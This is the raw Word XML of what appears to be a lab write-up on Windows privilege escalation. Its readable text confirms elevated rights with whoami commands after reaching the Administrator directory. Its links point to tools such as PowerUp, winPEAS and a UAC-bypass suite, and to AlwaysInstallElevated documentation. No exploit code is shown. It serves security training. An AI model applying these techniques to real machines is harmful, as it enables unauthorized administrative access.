        <w:t xml:space="preserve"> windows will be opened with higher privileges and we can confirm it by utilizing the command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> /all</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> /priv</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. This command provides a comprehensive view of the current user's privileges. And we can now access the Administrator directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A432F3D" w14:textId="00E05806"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noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="359579FA" wp14:editId="16417C3F">
            <wp:extent cx="3495595" cy="2266366"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="90383139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3933" cy="2271772"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7825C1" w14:textId="77777777" w:rsidR="00C06BC9" w:rsidRPr="00C06BC9" w:rsidRDefault="00C06BC9" w:rsidP="00C06BC9">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Note: Wait for 5 minutes after spawning the target. Disregard the licensing message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B43654" w14:textId="77777777" w:rsidR="00213442" w:rsidRDefault="00213442"/>
    <w:sectPr w:rsidR="002134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701E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4FBC7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27786E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C4125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9556B1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C0C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0743126">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="543173433">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1940403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0CA"/>
    <w:rsid w:val="00213442"/>
    <w:rsid w:val="009360CA"/>
    <w:rsid w:val="00AD1271"/>
    <w:rsid w:val="00C06BC9"/>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DDFA9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5C4797D9-F164-4DF9-B73F-7D0680BB6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06BC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14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00C06BC9"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:val="en-SE" w:eastAsia="en-S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BC9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
      <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00C06BC9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C06BC9"/>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 w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C06BC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06BC9"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-success">
    <w:name w:val="text-success"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C06BC9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C0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SE" w:eastAsia="en-SE"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLPreformattedChar">
    <w:name w:val="HTML Preformatted Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="HTMLPreformatted"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00C06BC9"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C06BC9"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="mb-0">
    <w:name w:val="mb-0"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00C06BC9"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-SE" w:eastAsia="en-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4859">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="738946868">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1801260017">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="120514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9249">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1326207627">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1149634939">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2058969387">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="19151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9652">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1836608801">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1116102139">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="387146974">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="297418857">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="10960270">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="540481774">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="447507724">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="777407605">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1702970864">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1686596249">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="11293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dotnet/standard/io/file-path-formats" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/sre/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated"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sourceforge.net/projects/uberregedit/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/simpregedit/" TargetMode="External"/><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carlospolop/PEASS-ng/tree/master/winPEAS" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://humongousretail.com/remote/" TargetMode="Externa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github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC"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xplorerplusplus.com/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://academy.hackthebox.com/module/67/section/630" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.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1853</Words>
  <Characters>10564</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>88</Lines>
  <Paragraphs>24</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>12393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Milosavljevic</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Aleksandar Milosavljevic</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-08-08T08:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-08T09:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>